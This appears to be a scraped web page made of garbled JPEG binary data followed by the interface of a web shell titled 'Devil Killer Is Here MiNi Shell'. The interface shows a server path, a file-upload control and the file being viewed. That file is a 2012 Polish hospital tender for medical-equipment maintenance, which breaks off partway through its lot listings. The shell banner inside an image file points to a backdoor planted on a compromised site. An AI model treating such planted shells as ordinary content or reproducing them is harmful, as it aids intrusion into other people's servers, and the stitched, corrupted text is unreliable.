JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120322/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120322/90250-N-2012.html

<p class="kh_header"><b>Bochnia: Usługi w zakresie wykonywania przeglądów technicznych oraz napraw bieżących sprzętu medycznego dla SP ZOZ w Bochni Szpital Powiatowy im. bł. Marty Wieckiej</b><br>
<b>Numer ogłoszenia: 90250 - 2012; data zamieszczenia: 22.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie wykonywania przeglądów technicznych oraz napraw bieżących sprzętu medycznego dla SP ZOZ w Bochni Szpital Powiatowy im. bł. Marty Wieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi polegającej na wykonywaniu okresowych przeglądów technicznych, oraz napraw aparatury, sprzętu medycznego i technicznego będących na wyposażeniu Zamawiającego. Szczegółowy wykaz aparatury i sprzętu stanowi załącznik nr 3 do SIWZ - formularz asortymentowo-cenowy.

2.	Przedmiot zamówienia został podzielony na zadania:
Zadanie nr 1 Sprzęt medyczny
Zadanie nr 2 Zestawy monitorujące, kardiomonitory, kardiotokografy
Zadanie nr 3 Aparaty EKG, Pompy infuzyjne
Zadanie nr 4 Respiratory z zestawami monitorującymi
Zadanie nr 5 Respiratory Bennet
Zadanie nr 6 Respiratory inne
Zadanie nr 7 Defibrylatory, Zestawy reanimacyjne
Zadanie nr 8 Inkubatory i sprzęt do leczenia noworodków
Zadanie nr 9 Aparaty do znieczulania
Zadanie nr 10 Aparat do znieczulania
Zadanie nr 11 Lancentrony, Diatermie
Zadanie nr 12 Sterylizatory, autoklawy, destylatorka
Zadanie nr 13 Aparatura radiologiczna
Zadanie nr 14 Aparatura ultrasonograficzna
Zadanie nr 15 Aparatura endoskopowa I
Zadanie nr 16 Aparatura endoskopowa II
Zadanie nr 17 Zestaw Laparoskopowy
Zadanie nr 18 Urządzenia do fizykoterpaii
Zadanie nr 19 Urządzenia do mycia
Zadanie nr 20 Urządzenia laboratoryjne-różne
Zadanie nr 21 Aparat do hemodializy
Zadanie nr 22 Sprzęt medyczny - pozostały
Zadanie nr 23 Aparatura Echokardiograficzna
Zadanie nr 24 Urządzenia do podawania kontrastu
Zadanie nr 25 Aparat do znieczulania
Zadanie nr 26 Aparatura labolatoryjna I
Zadanie nr 27 Aparat medyczna
Zadanie nr 28 Aparatura Labolatoryjna II
Zadanie nr 29 Aparatura Labolatoryjna III
Zadanie nr 30 Aparatura okulistyczna
Zadanie nr 31 Urzadzenie do badania słuchu
Zadanie nr 32 Wagi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy o maksymalnej wartości nie przekraczającej 20 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 32.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1) Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1) Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1) Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1) Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1) Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. 
W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
2.	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów. 
3.	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego 
i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie 
Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  wykonawcą.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a).	danych identyfikujących strony umowy, takich jak np. firma, adresu siedziby lub inne zapisy dotyczące wskazania stron. 
b).	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych netto określonych, w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny mogą ulec zmianie w przypadku wzrostu/spadku obowiązujących stawek podatków i opłat granicznych. 
c).	w każdym czasie trwania umowy Wykonawca może dokonać obniżki cen jednostkowych.
d).	zmiany wykazu sprzętu objętego przedmiotem umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej, ul. Krakowska 31, 32-700 Bochnia, Dział Zaopatrzenia i Zamówień Publicznych, pok. 9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 12:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej, ul. Krakowska 31, 32-700 Bochnia, Dziennik podawczym pokój nr 11, Pawilon A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 Sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Ssak elektryczny	WAN M1	3	1 x w roku
2.	Ssak elektryczny	SO -4	1	1 x w roku
3.	Ssak elektryczny	SSU-2	2	1 x w roku
4.	Ssak elektryczny	CM-4	1	1 x w roku
5.	Ssak elektryczny	JA-VAC-2	1	1 x w roku
6.	Ssak elektryczny	SK - 07	1	1 x w roku
7.	Ssak elektryczny	ASCOR  C-30	2	1 x w roku
8.	Ssak elektryczny	WAN M	1	1 x w roku
9.	Ssak elektryczny		2	1 x w roku
10.	Inhalator	Medix AC 2000	1	1 x w roku
11.	Inhalator	Parimaster	1	1 x w roku
12.	Inhalator	Pari-Boy	1	1 x w roku
13.	Inhalator	Junior Boy	2	1 x w roku
14.	Inhalator	Turbo Pari-Boy	2	1 x w roku
15.	Inhalator	Dyszowy Elisir	3	1 x w roku
16.	Inhalator	Biedronka	1	1 x w roku
17.	Inhalator	Elisir	2	1 x w roku
18.	Spirometr	Pneumo	1	1 x na rok
19.	Spirometr	Lungtest	2	1 x na rok
20.	Łóżko  elektryczne 	LE - 12.0	9	1 x na rok
21.	Łóżko elektryczne 	Le - 02.0	8	1 x na rok
22.	Stół operacyjny	SU 	3	1 x na rok
23.	Lampa  4-ogniskowa + zasilacz	Z-430	5	1 x w roku
24.	Lampa operacyjna sufitowa podwójna 	ML 600/D 	3	1 x w roku
25.	Lampa zabiegowa scienna  jednogniskowa	Medlux 0975	2	1 x w roku
26.	Lampa zabiegowa  jednogniskowa	BH 132	5	1 x w roku
27.	Lampa  zabiegowa jednogniskowa	PM - 121., jezdna	2	1 x w roku
28.	Lampa Sollux	LSC	8	1 x w roku
29.	Lampa Sollux	LSK	5	1 x w roku
30.	Lampa do fototerapii	KLA  32	2	1 x w roku
31.	Lampa do fototerapii	NEO-BLUE 	1	1 x w roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 Zestawy monitorujące, kardiomonitory, kardiotokografy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Kardiomonitor	FX - 862	4	1 x w roku
2.	Kardiomonitor	Biazet	4	1 x w roku
3.	Kardiomonitor	Icard M26	2	1 x w roku
4.	Kardiomonitor 	Icard M78	1	1 x w roku
5.	Kardiomonitor	Icard M88	1	1 x w roku
6.	Kardiomonitor	Icard M 98	1	1 x w roku
7.	Kardiomonitor	Icard M6	1	1 x w roku
8.	Kardiomonitor 	Diaskope 2	2	1 x w roku
9.	Kardiomonitor	Propaq 244	2	1 x w roku
10.	Monitor nieinwazyjny	C -3	2	1 x w roku
11.	Monitor parametrów zyciowych 	Colin	2	1 x w roku
12.	Kardiotokograf	Sonicard	2	1 x w roku
13.	Kardiotokograf	Oxford Sonicard	1	1 x w roku
14.	Kardiotokograf	M 1351 A	1	1 x w roku
15.	Kardiotokograf	FM-7	1	1 x w roku
16.	Kardiotokograf	FM-20	1	1 x w roku
17.	Kardiomonitor	FX 2000	19	1 x w roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 Aparaty EKG, Pompy infuzyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Elektrokardiograf	Multicard E-30	2	1 x w roku
2.	Elektrokardiograf	Ascard Blue	3	1 x w roku
3.	Elektrokardiograf	Midicard	2	1 x w roku
4.	Elektrokardiograf	Ascard B5	3	1 x w roku
5.	Elektrokardiograf	Ascard 	3	1 x w roku
6.	Elektrokardiograf	Ascard 3	1	1 x w roku
7.	Elektrokardiograf	MR  BLUE	2	1 x w roku
8.	Rejestrator 	CR 07	2	1 x na rok
9.	Rejestrator	Aspekt 702	4	1 x na rok
10.	Zestaw badań wysiłkowych	CRG 3	1	1 x na rok
11.	Bieżnia do ćwiczeń	RB 612	1	1 x na rok
12.	Pompa infuzyjna	Aitecs  2015	21	1 x w roku
13.	Pompa infuzyjna	Pluma A 07A	4	1 x w roku
14.	Pompa infuzyjna	Program	4	1 x w roku
15.	Pompa infuzyjna	Ascor	11	1 x w roku
16.	Pompa infuzyjna 	Pilot A	3	1 x w roku
17.	Pompa infuzyjna	Kwapisz	6	1 x w roku
18.	Pompa infuzyjna 	Braun	2	1 x w roku
19.	Pompa infuzyjna	Medima	3	1 x w roku
20.	Pompa infuzyjna 	Agilia	4	1 x w roku
21.	Pompa infuzyjna	Duet 	1	1 x w roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 Respiratory z zestawami monitorującymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Respirator 	Pulmolog	4	2
2.	Respirator 	Oxylog 100	1	2
3.	Respirator	Biomedical	2	2
4.	Respirator	Sechrist	1	2
5.	Respirator	Medumad	1	2
6.	Respirator 	HFS 3000	2	2
7.	Respirator	Osirus 3	5	1
8.	Respirator	Raphel	1	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 Respiratory Bennet.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Respirator	NPB 760	2	1 x  na rok
2.	Respirator	NPB 840	1	1 x  na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 Respiratory inne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Nazwa	Typ	Ilość sztuk	Częstotliwość przeglądów
1.	Respirator	Bird 840	1	1 x  na rok
2.	Respirator	Awea	1	1 x  na rok
3.	Aparat do resuscytacji Neo-puff	RD 900	2	1 x  na rok
4.	Aparat do wspomagania oddechu 	Infant flov	2	1 x  na rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za naprawę za 1 roboczogodzinę - 20</li>
